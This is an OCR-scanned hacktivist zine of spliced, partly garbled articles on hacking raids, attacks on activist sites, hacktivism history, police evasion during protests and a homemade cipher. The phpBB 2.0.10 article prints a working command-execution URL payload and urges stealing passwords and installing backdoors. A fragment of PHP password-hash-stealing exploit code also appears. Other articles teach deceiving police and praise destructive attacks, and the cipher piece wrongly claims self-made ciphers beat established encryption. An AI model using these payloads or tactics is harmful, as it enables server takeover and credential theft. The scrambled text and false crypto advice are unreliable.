tails. Are copies of the search warrant available? Electronic copies of the search warrant can be downloaded at the website FreeJeremy.com. The affidavit which established probable cause has not been shown to us yet. Complete manual made by and for federal law enforcement regarding how to obtain a warrant for a search and the proce- dure for gathering evidence on seized equipment for criminal investigations. Field Guidance on New Authorities That Relate to Computer Crime and Electronic Evidence Enacted in the USA Patriot Act of 2001 - http://www.usdoj.gov/criminal/cybercrime/Patri- otAct.htm Document for law enforcement that details new surveillance capabilities and evidence collection as a result of changes with the USA Patriot Act. Scary read! Federal White Collar Crime - http://profs.lp.findlaw.com/col- lar/ - A broad, non-computer specific introduction to federal criminal law. Homeland Insecurity: The end of Civil Liberties - http://www. oilempire. us/homeland.html An analysis of recent anti- 'terrorism' legislation removes many of our constitutionally protected freedoms and sets the stage for a new age of fascism. Pong Khumdee, partner and roommate, can be reached at pongtakespictures@gmail.com Chris Montgomery, roommate and co-worker, can be reached at chris@macspecialist.com. Jason Hammond, Jeremy's twin brother, can be reached at icetitan@graffiti.net. Please take into consideration that this is an ongoing criminal investigation, and all of the above information is likely tapped and monitored. Please do not send anything incriminating or detrimental to Jeremy's case. Right Wing Hackers Attack Independent Media Network A number of people have started to organize and attack various Independent Media Centers as well as a number of other progres- sive and leftist websites. In the past, these attacks have ranged from simple xss attacks which redirect visitors or trashing the fllesystem / databases. The people responsible show no understanding of the ideas behind the open publishing system IndyMedia, which is free for all users to participate in the discussion. These actions are not hacking nor hacktivism: they utilize public pre-written exploits to simply 'shout the other side down'. An attack on IndyMedia is an attack on free speech itself. These right-wing extremists need to be confronted and exposed as the online fascists they really are. During the Republican National Convention, a group of hackers called RightWingExtremist.net was formed by Brett Chance(elac, clorox, awbOt, etc) from Piano TX. This group came out of the ultra conservative ProtestWarrior.com who advocates disrupting and at- tacking leftist organizations. Their actions had started with minor stuff like launching ddos attacks on NYC IndyMedia. Later they discovered a xss flaw in dadalMC that allowed them to post news that would automatically redirect users to his own website where it would play sounds that said childish political rhetoric like 'the nazi indymedia wants to destroy israel', etc. Because of pressure from the online community, Brett from RightWingExtremist.net closed down the site for several months. Months later, Jeremy from HackThisSite.org discovered a flaw in dadalMC that allowed the upload of malicious PHP files would could be used to take over the entire server. This announcement was quietly made to dadalMC who was urged to keep it private until the tech staff of every indymedia center was notified and had their scripts patched to protect themselves. Several other indepen- dent IndyMedia centers including Chicago(which got patched) and NYC were notified ahead of time. But before the majority of sites were patched, DadalMC posted the vulnerability information on the website, including instructions on how it can be exploited. A month later a group calling itself the gOOns.com have attacked and defaced a dozen indymedia web- sites using the vulnerability posted to dadaimc. On the hacked web- sites, a message calling indymedia 'liars' and 'anti-republicans' were posted. Soon after, hackers and indymedia techs started working together to fix each other's code and bring backups back online as well as expose the gOOns.. Prates t Warrior Other groups including Protest- Warrior.com, FreeRepublic.com, and KobeHQ.com have resorted to online harassment to discredit and silence progressive views The gOOns started out by attacking online gaming clan websites, but moved farther to the right when Elac from RightWingExtremist.net joined up under his new name clorox. When they defaced IndyMe- dia sites, people started to gather information and infiltrate their organization and soon after all of their private details were released to the public to show like actions like this will not be tolerated Many other right-wing trolls continue to try to disrupt IndyMedia and left-wing protest groups. These individuals operate under sev- eral different names including ProtestWarrior.com, RightWingEx- tremist.net, FreeRepublic.com, KobeHQ.com, FreeDominion.com, LittleGreenFootballs.com, and more. Many of these groups are sus- pected of being financed operations from governments or corpora- tions similar to the COINTELPRO program from the 60s and 70s. Common activities range from flooding message boards, faking votes and reviews in online polls, releasing personal information of key organizers, spreading false rumors and scandals, etc. All IndyMedia centers running DadalMC are strongly encouraged to patch their software, but more importantly, hackers need to work with activist groups around the world to make sure their software is secure, encrypted, and anonymous. Check dadaimc.org or sfactive.org often for security updates. DirectNIC enforces ICANN WHOIS contact information accuracy DirectNIC has begun selectively enforcing an obscure rule of ICANN that all con- tact details in the WHOIS database on the owner of a domain must be accurate. They have sent emails out to owners of domains threatening to delete the domain if the contact details are not corrected and verified. The owner has to fax in proof of their name, home address, phone and fax number. They have threatened to shut down the site if accurate details are not provided in 15 days. Activists have just launched prole.info, which provides a number of anti-capitalist writings and pamphlets, and sent announcements to a variety of email lists and websites. Two days after prole.info was threatened to provide accurate details or be faced with the domain being shut down. This is a gross privacy violation, and it is unfair that it seems to be very loosely and even selectively enforced. Thousands of domains give questionable and fake details, but why was prole.info targeted? Does DirectNIC hire a team of people to randomly browse websites and verify contact details? Was prole.info reported by people who wanted to find out where the activists live? We do not want to face harassment from ICANN, DirectNIC, or anyone else who take away our privacy on the net. Put pres- sure on those who create and enforce these policies that threaten internet free speech http://www.prole.info tech@prole.info To a valued directNIC customer, It has come to our attention that one or more of your domain names lists inaccurate information in the WHOIS contact database. To avoid losing your domain (s), please update this information within 15 days. Here is a list of affected domains: PROLE.INFO Errors in Registrant Information: Proles - Haywood, William Name: INCORRECT Address: INCORRECT Phone: INCORRECT Description: "William Haywood" is a histori- cal figure related to the website's content and not likely a real (modern) person. The address and phone are clearly non-existant . Why must we do this? Unfortunately, as a do- main name registrar, the Internet Corporation for Assigned Names and Numbers (ICANN) has placed the responsibility on us to enforce the governing body's rules, including seeing to it that information provided in WHOIS is up to date and accurate. Failure for Intercosmos to adhere to these rules, after being notified of a potential violation, is grounds for our company's ac- creditation to be revoked. One major regis- trar already was threatened with this very action . Please update your information and fax to us proof of all your contacts for these domains to 504-566-0484. Please send your fax to the Attention of the Abuse Department. Thanks for your cooperation and for choos- ing directNIC. Sincerely, directNIC Customer Support support@directnic.com developed a "theory and artform all in one." It was called Floodnet. Flood- net was developed by "four artist-hacker-activists" under a new group called the "Electronic Disturbance Theatre" (EDT). Stalbaum explained that Floodnet is an "example of conceptual net.art [sic] that empowers people through activist/artistic expression." According to the CAE's website, Internet Surfers in support of the "digital resistance" against globalization can simply click on a link, leave the browser open, and the Floodnet Applet will "automatically reload the target web page every few seconds (Stalbaum)." The CAE first launched their Floodnet tools against websites connected to "Mexican neo-liberalism" in solidarity with the Zapatista resistance. The actions were defined as a "virtual sit-in," which parallel action in the streets. The Floodnet script deliberately makes an invalid request using keywords such as "human_rights." The targeted server will then respond with "human_rights not found on this server (Stalbaum)." Other hack- ing groups including the Electrohippies Collective also launched similar floodnet attacks on groups like the World Trade Organization to coincide with major street actions. The ehippies "claimed that the action was suc- cessful... with the WTO conference networks being constantly slowed, brought to a complete total halt on two occasions and with 450,000 people participating over five days This sort of online direct action is disputed as "hacktivism" by Oxblood Ruffin, a prominent member of the Cult of the Dead Cow. Oxblood claimed in a speech at the CyberCrime and Digital Law Enforcement Conference at Yale Law School that "DoS' (denial of service) attacks (carried out by the CAE, EDT, and ehippies) "smelled like the same cheap hacks were be- ing elevated to political street protests when they weren't more than script kiddy antics in drag." He declared that "digital dis- obedience or cyber sit-ins" were not synonymous with hacktivism. Instead Ruffin came up with a modified form of Richard Stallman's GPL known as the "Hacktivis- mo Enhanced Source Soft- ware License Agreement." HESSLAuses the Universal Declaration of Human Rights (UDHR) as the basis of its philosophy. The UDHR was developed in 1948 in the General Assembly of the United Nations to avoid the atrocities committed during World War II. Its main principles are: The HESSLA license follows the declaration that: Both Hacktivismo and its end-users to go to court if someone tries to use the software in a malicious manner, or to introduce harmful changes in the software. It also contains more robust language than has previously been used to maximize enforcement against governments around the world. Any government or institution guilty of human rights violations can be prosecuted if caught using software with this license. Although this li- cense has never debut in the court systems, it remains a symbolic act of the hacktivist and has sprouted in other scalable and effective forms. However, many hackers feel that the GPL and HESSLA license do not go far enough in defending the open source movement. Corporations like SCO and Microsoft are actively working together to sue major distributors of Linux. Because of their economic advantage and influence in the court system, they have been successful in bringing charges against the Linux community for allegedly stealing portions of "copyrighted" SCO UNIX source codes. Hackers, left with no other voice, have taken matters in their own hands by directly attacking SCO servers. Tactics have started out with simple DDOS attacks which shut down severs for periods of time (Wagner) but have evolved into more complex attacks such as website defacements (Barr) and even worms and viruses infecting hundreds of thousands of computers to attack SCO servers (Hines). The actions of SCO have radicalized hackers to take actions in more ways than distribut- ing free code. More aggressive forms of hacktivism have emerged in the Middle East conflict. "There has been a massive increase in online activities, particu- larly in relation to the conflict in Palestine and Israel (and more recently associated with 9-11), which has been labeled 'e-jihad'," explains Gary Bunt. "E-jihad" is an electronic version of the holy war representing the struggle of good over evil. The "massive increase in online activities" is cyber warfare. It wholly rejects the "digitally correct" philosophy and has taken the hacker ethic of the "hands-on imperative" or "direct action" to its final step. The Pro-Palestinian hacking group,"World's Fantabulous Defacers" (WFD) was responsible for hundreds of web defacements against Israeli, Indian, Taiwanese, Yugoslavic and the online bank Karachi website. Their most notorious attack was against the Israeli Prime Minister Ariel Sha- ron's election campaign website in 200 1 . They posted grotesque images of "a badly scarred child whose horrific injuries were the result of his house being 'burned down by illegal Jewish settlers in the West Bank'." They explained their actions that: We are no heroes. . .but merely hackers. . .while we understand that it is not feasible for us to successfully make a legitimate difference in oppressed and tortured lives in Palestine... we will continue to deface, not destroy, for the cause. . .until there is reform. . .until there is change. . .until all suf- fering children in the world can wake up to a world of peace, not a world of death, destruction, and chaos, a world devoid of war. (Bunt) They included links to the Intifada (translated uprising) Online, Palestin- ian Information Center, and the Islamic Association for Palestine. Other Muslim hacking groups have started organizing against Israeli and Indian sites by working with various hacking groups and distribut- ing hacker tools. Their actions range from politically motivated hacks to shout-outs to other affiliated groups. One such Muslim hacking group is called "The Muslim Hacker's Club" (MHC). In addition to distributing vi- ruses and flood tools, Alldas.org "logged 28 hacking attacks linked to the MHC" against commercial Indian sites (Bunt). Another notorious group was called the "Silverlords." Alldas.org documented 1,436 defacements from November 2000 to April 2002. In their major defacement of paintcompany.com, they "presented a pro-Kash- miri page, with graphic photographs of human rights violations." They quoted, "STOP THE INDIAN GENOCIDE AGAINST THE PEO- PLE OF KASHMIR. FREE KASHMIR, PALESTINE. . .END THE INJUST U.N SANCTIONS ON IRAQ." The hacking group GFORCE was another accomplished collective. They were known to have hacked the US Defense Test & Evaluation Proces- sional Institute (DTEPI) in September 2000. They replaced the site's con- tent with very strong messages and photos of Palestinian children being killed by the Israeli troops. Their ending statement explains their call for an e-jihad: "We have suffered throughout the wages and will suffer no more. This is the era of cyberwarefare, where once again the Muslims have prevailed. We will not rest till every node, every line, every bit of information con- tained in our suppressors has not been wiped out, returning them to the dark ages. We will not tolerate anymore, and we will not fail." (Bunt) GFORCE also hacked other "US government agencies, military and other targets via Taiwan-based platforms." GFORCE was the most "prominent group of hackers to have emerge from Pakistan (Dr. Nuker, Pakistani Hackerz Club)." The hacking group UNITY have increased militancy under the potent cyber Islamic ideology - hacking under the "iron guard banner." They ad- vocated penetrating the "enemy's network" and "planting code" to cause direct infrastructure damage in what they perceive as online war. UNITY described in systematic format in their hacking strategy It follows: 1) Disabling official Israeli government sites. 2) Crashing financial sites. 3) Knocking out main Israeli ISP servers. 4) Blitzing major Israeli e-commerce sites causing transaction loss. UNITY believes that "the more money they (Israeli cyber fronts) lose in fixing and strengthening their systems means less money to buy bullets and rockets for use against our children." Gilad Rabinovich, CEO of the Israeli ISP Netvision said, "All Israeli ISPs have been overloaded with data" and confessed that "we are just the only ones to admit it." In addi- tion to being "overloaded with data" the CEO continues that if the cyber war were to continue "it will steal resources from us and hurt customers. (Gambill)" In order to be effective, it is imperative that all aspects of hacktivism is embraced; promoting free decentralized in- formation networks as well as taking direct action against those responsible for violating digital and human rights. The materialization of a free society requires the systematic destruction of oppressive forces working against the free flow of information. The internet is not free; it is made free by those who are willing to fight to protect it. Beyond Physical Borders: Hacking and Activism on the Net by fetus The combination of activism, the Internet and hacking is hacktivism; its abstract can be partially defined in the "hacker ethic," as described in Ste- ven Levy's Hackers: 1) Access to computers- and anything which might each you something about the way the world works should be unlimited and total. Always yield to the Hands-On Imperative! 2) All information should be free. 3) Mistrust Authority - Promote Decentralization 4) Hackers should be judged by their hacking, not bogus criteria such as degrees, age, race or religion. 5) You can create art and beauty on a computer. Free information, although described by Levy as an ethic, is more pre- cisely a core value for which the hacker ethic achieves. It demands uncom- promised availability. However there are forces opposing its existence. Companies and governments are threatened and have responded to hack- ers by attacking networks of free communication as they progress toward the free information movement. Hacktivism is the active struggle to mate- rialize free societies as described by the hacker ethic. The concept of unlimited computer access for the sake of learning (the first hacker ethic) is manifested by a variety of organizations. Such ex- amples are free softwares, education, music and free network availability. These collectives naturally adhere to the fundamental belief that all infor- mation should be free (the second hacker ethic). The free software movement has its roots with Richard Stallman. He de- veloped GNU, which stands for "Gnu's Not Unix. GNU is a model for software developers to release their code free from the threat of privatiza- tion. This is done under the General Public License, or the GPL. Accord- ing to the website, the GPL is constructed to assure that software develop- ers "have the freedom to distribute copies of free software, receive source code, and change the software or use pieces of it in new programs. The GPL assures that this is accomplished by specifically stating: 1) Changes to existing free software must be made known to its recipient that it was modified. 2) All softwares released under the GPL "must be licensed for everyone's free use or not licensed at all. The successes of the open source movement have inspired programmers to release their code under the GPL. For example, sourceforge.net pro- vides an opportunity for people to release their projects (which currently numbers at 99,572) freely. Other institutions have adapted the open source GPL model. The online free encyclopedia Wikipedia encourages people to contribute and edit its contents implementing democratic methods such as page history and discussion. Universities are also contributing to the open source movement by releas- ing all course materials and lectures free of charge. For example the Open Course Ware project at MIT has set a new standard for higher education. Charles Vest, President of MIT, in the annual report explained that: "The computer industry learned the hard way that closed software sys- tems - based on a framework of proprietary knowledge - did not fit the world they themselves had created. The organic world of open software and open systems was the true wave of the future. Higher education must learn from this. We must create open knowledge systems as the new frame- work for teaching and learning. " Although these intuitions have taken the initiative to spread the benefits of open source, giant corporations (and governments alike) are vehemently fighting its development. A major milestone case is SCO vs. IBM. Stephen Shanklan, staff writer of CNET News.com reported that SCO, the "inheri- tor of the intellectual property for the Unix operating system has sued IBM for more than $1 billion." Chris Sontag, Senior Vice President of SCO claimed that IBM "has contaminated their Linux work with inappropriate knowledge from Unix." However, SCO does not stand unsupported in this legal battle. Microsoft, a multibillion-dollar software corporation and an advocator of proprietary source code, had been financially backing SCO's legal defense. In another article, Stephen Shanklan reported that Microsoft gave a total of $16.6 million dollars to SCO "for a Unix license, according to regulatory filings." Corporations like Microsoft and SCO are using their economic superiority to undermine the free-software movement because it threatens their profit in the industry. Corporations are not the only entity working against the free information evolution. The U.S. Department of State, in a release made by the Bureau of Democracy admits that the Chinese government: Continued to suppress political, religious and social groups, as well as individuals, that it perceived to be a threat to regime power or national stability. The Government's human rights record remained poor, and the Government continued to commit numerous and serious abuses. It refused to allow social, political or religious groups to organize or act independently of the Government and the Communist Party. Those who tried to act independently were often harassed, detained or abused by the authorities. Nick Mathaison, a writer for the Observer reported Microsoft sold tech- nology used to censor the Internet to the Chinese government. It has "resulted in the jailing of its political opponents" Mathaison continues to explain that Amnesty International "has cited Microsoft for helping fuel 'a dramatic rise in the number of people detained or sentenced for internet- related offences'." In its press release, Microsoft declared that it signed an agreement with the Chinese authorities to "provide national governments with controlled access to Microsoft and Windows source code." The agreement called "Government Security Program" is "tailored to the specialized security requirements of governments" that permit them to control information in an "appropriate way." In addition to "controlled access," the GSP agree- ment allows the participating government to "undertake research projects in the field of information security." This means that the Chinese govern- ment can spy (and punish) on its people using Microsoft products. Mi- crosoft has profited from the deprivation of first amendment rights of the Chinese people. Hackers have declared the inherent mistrust of authority figures because of repressive actions of large corporations and governments. The hacking community has responded by innovating tools to counter cyber oppression to bypass censorship. Hackers and activists are working together to apply civil disobedience tactics on the internet. The "Hands-On Imperative" is re-appropriated to "direct action" which generates activity liberating the people and the same time challenging the law. Hackers have been able to overcome censorship by creating decentralized content distribution networks. These networks remain anonymous and secure because it requires all users in the network to share data in small parts. Many programs have emerged such as "peekabooty," "six/four" and "Freenet." According to sourceforge.net, a website that fosters the open source community, "Freenet is free software designed to ensure true free- dom of communication over the internet. It allows anybody to publish and read information with complete anonymity." In addition to developing technology to defend freedom on the Internet, hackers have staged attacks against those responsible for oppression. Tim Jordan insightfully states, "The rise of hacktivism has not superseded or destroyed previous hacker politics, but has reconfigured it within a broader political landscape" (2002). The Critical Arts Ensemble (CAE) was established in 1994 arguing that the onset of the Internet will create a space in which physical laws becomes an ineffective means of enforce- ment. The CAE states, "Elite power, having rid itself of its national and urban bases to wander in absence on the electronic pathways, can no lon- ger be disrupted by strategies predicted upon the contestation of sedentary forces (Jordan 2004)." Groups like the CAE are coinciding online protests with street actions. The power now lies in computer networks. It is in the form of "Electronic Civil Disobedience (ECD)." The "nomadic" power of the corporation must be fought against on the Internet. The CAE believes that: "The expertise hackers develop in the technologies of cyberspace can offset the imbalance of power that activists are seeking to redress. ECD magnifies its effects not by increasing the numbers of bodies involved in protests... but by using the expertise of hackers to increase their political effects." (Jordan 2005) Within two years of the CAE's call for the politicization of hackers, they PhpBB 2.0.10 Disclosure Causes Mischief + Mayhem on Net In use by millions of websites all over the internet, PhpBB is one of the most popular message board systems. You can imagine the mayhem that ensued when a major vulnerability was discovered late November that allowed the execution of commands on all major versions prior to 2.0.10. Many us- ers might remember Jessica Soules as a developer for Hack This Site. No one expected her release of the bug to Bugtraq would result in such an explosion that caused several major worms that killed tens of thousands of websites and bless script kiddies with easy to use tools to take down a server. The vulnerability lies in viewtopic.php, which does not cor- recty validate the user-supplied 'highlight' variable as it is passed to PHP's eval() command. You can break out of their command and issue your own PHP commands, includ- ing the system() command, allowing remote execution of commands. You could craft a URL similar to /viewtopic. php?t=2&highlight=%2527%252esystem(chr(108)%252ech r(115))%252e%2527, which would execute 'Is' giving you a directory listing. This exploit opens the machine up for you to play with the permissions of whatever the web server is running as. From here you could perform a wide range of actions from grabbing password information from config files or install backdoors or just simply fuck up their forums. The box is essentially yours to play with, and it shouldn't be difficult Nmap Developers Intimidated by the FBI by Wyrmkill Fyodor, the creator of the Nmap portscanning says he is being pressured by the Federal Bureau of Investigation for copies of the Web server log that hosts his Web site, Insecure.org Nmap is an open source tool designed to help security ex- perts scan networks, services and applications. Federal agents are trying to intimidate hackers who download and use these tools, no matter what they do with it. Fyodor made this announcement in his blog, "FBI agents from all over the country havecontacted me demanding Web server log data from Insecure.org. They don't give me rea- sons, but they generally seem to be investigating a specific attacker whom they think may have visited the Nmap page at a certain time. So far, I have never given them anything. In some cases, they asked too late and data had already been purged through our data retention policy. In other cases, they failed to serve the subpoena properly. Sometimes they try asking without a subpoena and give up when I demand one." It is not a new tactic for law enforcement to use intimidation and pressure to convince hackers to give in - but without a search warrant, or a proper subpoena, you are not required to answer questions or give anything to them. Stand up for your digital rights! http ://www. insecure . org/nmap to find ways of gaining higher permissions to take over the machine entirely. It wasn't long before someone wrote a perl script to search google for vulnerable targets to attack and spread itself to. The Santy(or NeverEverNoSanity) worm ran at least 20 generations and killed an estimated 40,000 websites before google disabled the search queries that allowed the worm to spread. Several modifications of the worm changed search engines and queries slightly that allowed it to spread once again. The payload of the worm was to wipe all files and re- place it with the text, "This website has been defaced! ! !". For such a cleverly written worm, the author didn't have a whole lot to say, and caused a whole lot of random destruction and ruined things for hackers who wanted to use the phpbb bug for more legitimate purposes. The release of this major bug has had some massive implica- tions. In the future, we advise against disclosing such vulner- abilities because of the potential side effects of script kiddies or destructive worms. Since Jess released it to Bugtraq, she has been under constant harassment from PhpBB, her host- ing provider, and other groups who have been personally affected by the PhpBB hack. In finding such a devestating security hole in such a major piece of software, Jessica will go down in history. INCENDIOS ¥ DEIITOS TELEPHONE GIVING FALSE ALARMS OF FIRES km CRIMES <?php /* Mac OS X password hash thief! Uorks on <=1D - 3 - 7 using /usr/bin/at vulnerability disc security is an illusion- anarchy is inevitable- exploit code written by your friends at HackThisSi te - o */ *i = echo " Extracted hashes from /usr/bin/at job outp system ("rm /tmp/pagetmp" ) n echo n tl Done!



$smb

$shal" \ Arm Yourself! from :TextAlerts (8.31.04 7:21PM) police planning on penning in all protesters at harald square and arresting: only exits though the south... sure if your staying with the group that you keep on top of where the front of the group is and where the back is, the cops will announce this every few blocks. This is important to make sure that one part isn't falling behind of the others and to keep us as a tighter group. Other Communication Techniques Walkie-Talkies should only be used if no other means of com- munication are available. Walkie-talkie can be monitored very easily, so all important messages should be encrypted. Things that relate to your tactics and positions should always be said using a code and if possible spread though other means besides radio. You do not need to encrypt everything, these radios can be used to spread messages like calling for a medic, telling the group to stick together, or that the police are attacking. Things like this that are not critical to your goal or that could hurt your bloc do not need to be encrypted and should be spread to as many people as possible to get the help you need. All those who plan on using a radio should have a one-time -use nick name that will conceal their identity when using the radio. Same goes for the code, you should change your code as often as possible. Ob- viously the downside of this is that the new code has to be taught to everyone again but it will improve your chances of keeping your communications secret. Another good trick is to send false info over the radio, say your going after one target while actu- ally going to another. Make it seem like a slip up, maybe one member will announce a fake target and another will come on the air saying that this is not secure and no more talk about the target should be discussed. Maybe even send a small group in that direction as a distraction. This could allow you to catch the police off guard if the cops are listening in, it could buy you the time you need to make it to your real target unnoticed. One idea that has been very effective in spreading tactical in- formation is setting up a tactical short message system (SMS) mailing list to send e-mail updates to trusted members of the bloc's cell phones. This is a little more technical then the other methods of communication disscussed so far but it has worked very well at the Republican National Convention and the Demo- cratic National Convention to spread tactical information to the different groups. Almost all cell phones have an e-mail address that you can send short text messages. This can be used to update your fellow freedom fighters with information dealing with po- lice movements, or as an alterative to using 2 way walkie-talkie. Your phones e-mail address will be your 1 0 digit phone number @ and address based on your provider. An example for verizon cell phones it will be [10 digit phone number] @vtext.com. If you don't know what your phones e-mail address is here is a short list of common providers. AT&T - @mobile.att.net Cingular - @mobile.mycingular.com Nextel - @messaging.nextel.com Sprint - ©messaging. sprintpcs.com T-Mobile - @tmomail.net Verizon - @ vtext.com The idea would be to have a mailing list where one use can send a message to an address which in turn would send it to all the members of the bloc who are registered on this list. This is the same idea behind services such as http://www.txtmod.com where you can register groups to send SMS messages too. Txt- Mob was set up to provide a easy way to set up SMS message groups of protestors for the RNC and the DNC. All the user had to do was setup a user account and follow a few steps and they have their mailing list set up. If you are part of a really large bloc you can set up a cluster mailing list where each affinity group could have their own mailing list, say groupl@mailinglist.net group2@mailinglist.net group3@mailinglist.net... Those address will be registered on another mailing list say bloc@mailinglist. net so that messages that only concern a certain group can stay within the group while larger messages that effect everyone can be sent to all the entire bloc using the bloc@mailinglist.net. If you change your mailing list address often and verify all those on the list the chance of police intercepting your tactical infor- mation is largly reduced. The downside is of course the amount of time it takes to type and send a message using a cell phone might not be avalible when your smashing the state, thats why other forms of communication should still be used. This article only touches the surface of how we can improve our communication and information gathering skills, tips discussed in this article are just the beginning. To pose a real threat to the powers of the state we must spend more of our time training for upcoming actions. Our enemies take training very seriously and so should we. We should start training people to use a wide range of equipment and skills. Not only those discussed in this article but what ever you can think of to keep our tactics new and cre- ative. The more random our tactics seem the less the police can prepare to counter them. This way, next time we meet the cops in battle, they wont know what hit them. Communication and Information ^ Gathering During a Protest by alxCIAda Where the black bloc goes the cops will not be far off. The cops almost always have an advantage over us with their expensive radios, 'less than lethal' weapons, all the intimidating riot gear you can dream of, and in most big cities enough toops to seri- ously outnumber the members of the bloc. One of the things that must be done to improve our effectiveness as a street fighting force and pose a bigger threat to the powers of the state, is work on our communication and information gathering skills prior and during an action. Pre- Action Recon Having scouts at an event is a very important thing to consider. Scouts should be out patrolling at an event well before it starts. The cops are out well before daylight setting up for the action and so should we. Scouts should travel in groups of 2-3, never alone this will lower the risk of them being picked up. Such re- con groups might want to use bicycles to increase their mobility. Some things recon teams should look out for are possible police staging areas that are common to multi-story parking complexes, materials that could be used in the construction of barricades and road blocks. Also take note of cameras, dead ends, possible routes to use if you need to escape, most importantly make sure you wont get lost. If your not from the area a map will come in handy. If your maps include information on the days action you must encrypt them. The importance of this cannot be stressed enough. If the police were to get a hold of a map with out it being encrypted the en- tire days action could be spoiled. In fact it happened during the R2k action in Philadelphia when cops got a hold of two people leaving a black bloc meeting. They had copies on them of maps of the days action which the cops discovered upon searching them. These maps were unencrypted and included the location of black bloc emergency gathering sites, as well as the areas that they were going to focus their activities on, and the location of supplies to be used in the creation of a road blocks. With the cops knowing all this information, you can imagine what kind of damage it did to the day's plans. Another tactic you might want to use is to divide the locals up, so instead of working as a local contingent they can be treated as specialists and divided up between groups to share their knowledge of the area. This way they can help more people learn the land and if it comes to it escape with out being arrested. Police Scanning One thing all groups involved in the days action should have is a police scanner, they can provide much needed information about police movements and tactics. Before you go out to battle cops with your police scanner there are some things you should know. A very important subject you must look into are your lo- cal laws dealing with police scanning. In the USA it is legal to use a police scanner in your own home, its when you hit the streets that their use might become illegal. In some places like California, New Jersey, and Vermont you cannot use the device in furtherance of a crime, which depending on the days action could be pinned onto those using one in a bloc. In some of the other states possession of such devices is illegal for anyone with out a permit. For a list of state laws dealing with police scanning go to: afn.org/~afn09444/scanlaws/scanner5.html Another thing you must do if you plan on using a police scanner during the days action, is look up the codes your local PD uses, try and remember as many as you can. Most importantly you must be able to recognize a code that would be used to describe the activities that are planned throughout the days action. A good way to get the codes down is to use your scanner when your not under the pressure of police oppression. If it seems as though they are talking to fast for you to get everything they are saying, just write down bits and pieces that you do get and if you don't know what the codes they are using mean look them up. You should be familiar with the way the radio operators are used to talking. No radio operator will ever talk using familiar conver- sation on the radio, they will use badge #s, police codes, and a phonetic alphabet. You should be able to understand what the officers are saying when they use a phonetic alphabet. The phonetic alphabet is used by communicators all over to clarify letters and spellings. When listening to the cops they will spell out peoples names, DOB, license plates, and pretty much everything else you can think of using a phonetic alphabet. A copy of the phonetic alphabet can be found at: hackbloc.org/alxciada/phonetic.txt It's very Important that you be discreet when using a scanner. It can easily make people think you are a cop or some kind of un- dercover officer not worthy of their trust. A good idea would be to keep it hidden and run a pair of head phones to it like a Walk- man, this will also allow you to hear it a lot better as it can get pretty loud on the streets. MAKE SURE the cops do not see the scanner, for the persons with the scanner will have an important role of helping move the bloc away from trouble and keeping the group updated on the police movements. If the cops identify you as a someone important or taking a role such as this they will try to single you out and try and arrest you. When the action starts the radio will be going off like crazy. In most cases of a brake away march away from a larger contingent catches the officers off guard. A common tactic of the police is to trap this group on a smaller side street circle them and make arrests. The person with the police scanner has to be aware of this and watch out for this being setup. Also listen to reports of people being arrested, get their names, DOB, and any info that you think can help their legal situation. It helps to have a notepad and a pen/pencil to write down info such as this. Make Th* bloc ha* broken The Police are retreating! □f the Cipherer _H Q A C YAZZNMKPWQUUTJC A_P W Putting Imagination Back into Cryptography E S EALSCBYHIKLMAQLS SAD OLA D PSYCHE 0 T W C Cryptography is the term given to the study of encryption, or making data secret by hiding its meaning in layers of alteration.. Great, but why should I bother reading this? I can use an en- cryption program... There are a great many well known ways of encryption. To name a few: the Caeser Shift, the Enigma code, MD4, MD5, Xor and many more. There are also alot of programs tailored to crack- ing these methods, thereby making these forms of encryption less and less secure. Great! Get the point please! I'm a busy person! Thus, there is not an encrytion more secure than one you have devised your- self; nobody else knows how it works so there is no program to decrypt it. This article has a brief guide to creat- ing your own cipher in four easy steps. Stage 1: Lost in Encryption Firstly we need a string to encrypt: PURPLE CARS ARE MORE FUN The first step in cipher creation is de- vising a way of hiding your data, there are three main schools of doing this. Substitution - Replacing the letters in a string with other letters, numbers, symbols etc. Shift - Altering the position of a letter in a string, or shifting the letter along the alphabet or ASCII table. Rail - Changing the presentation of the string to make it harder to compre- hend. I am going to implement a simple sub- stitution, replacing each letter in the string with the one directly proceeding it in the alphabet, making our sting: PURPLE CARS ARE MORE FUN otqokd bzqr zqd lnqd etm Where the letter A is in the string it has been counded around again in the alphabet, making the new letter Z. So, we can mathamaticly display our ci- pher as X-l, where x is a letter in out string. This however is horrendously insecure, and can easilly be decrypted by anoyone with an understanding of cryptography. So, we need to add something to make it harder. Stage 2: Variables For those who are unfamiliar wirth the workings of algorithm based cryp- tography a brief synopsis is as such: X*N*K, X being the numerical value of the letter or word to be encrypted. N being any given number and K be- ing the key. The key is a number which can be constantly changed to alter how the string is encrypted. In algorythim encryptions the key forms the variable. The shortcoming of such algorithim based encryptions is that any number crunching program can eventually be solved. Variables are just what they sound like, something that can be altered in the ci- pher to alter the outcome. Variables can be easilly changed to protetct intregrity and foil any decrypting attempts. For this example i will be impliment- ing a variable as follows; 7x. Where X is the numerical value of the of a letter (i could make this alot more difficult however i want a cipher that can be fairly easilly decrypted, by me any- way) Thus making the cipher without the variable added: otqokdbzqrzqdlnqdetml5 20 16 15 11 4 2 24 17 18 24 17 4 12 14 17 4 5 20 13 And with the variable added. 105 100 119 105 77 28 14 168 119 126 168 119 28 84 98 28 35 100 91. However this is still in essence substi- tution and can be fairly easilly cracked. The main benefit is that it has a basis for alteration at a moments notice. Stage 3: Constants Adding a constant has one big advan- tage, it stops any letter/number/symbol from being repeated, which helps pro- tect it from frequency based attacks. I will be using square numbers as my constant. Adding them to the front of the numbers. 1105 4100 9119 25105 2677 4928 6414 81168 100119 121126 144268 169119 19628 22584 25698 289119 32435 361100 40091 Stage 4: Calculated Chaos This final step is to throw off any at- tempts to break the cipher by adding a condition to the previous steps. This simply makes finding the cipher hard- er, it is best used in an IF situation. IF (whatever)=true then do whatever. So, I intend to alter the last stage in which if the number in the encrypted string is a prime number the square number is added to the rear of the text, not the for. Thus, making our cipher (after checks but before revisions) (Just a wee note, 1 isn't a prime number, contrary to popular belief) 1051 1004 1199 25105 3677 4928 1464 81168 100119 121126 268144 169119 28196 22584 25698 289119 35324 361100 91400 See, wasn't that easy? Final section: The Importance of nothing It seems to be a mindset of people to assume that numbers in an algebraic equasion will be intigers of 1 or more or -1 or less, not 0. 1 find that adding 0 (when it's replaced by something) will confuse any human led attacks, but not computer ones. So, there you have it. A brief inroduc- tion into the construction of a cipher. This is only an outline and i strongly encourage deviation, if you wish to know more, there are a number of good books and sites out there, and of course www.hackthissite.org. Finding and @©gD0DdDoi® PI Script V«H"-<93®b ttJ Red'iTKt if 5dthon:td MUhn dw-s rot exist roqulrfl("s«5 ion. Inc'); #* Art jztip: tiwt sell fc'oults 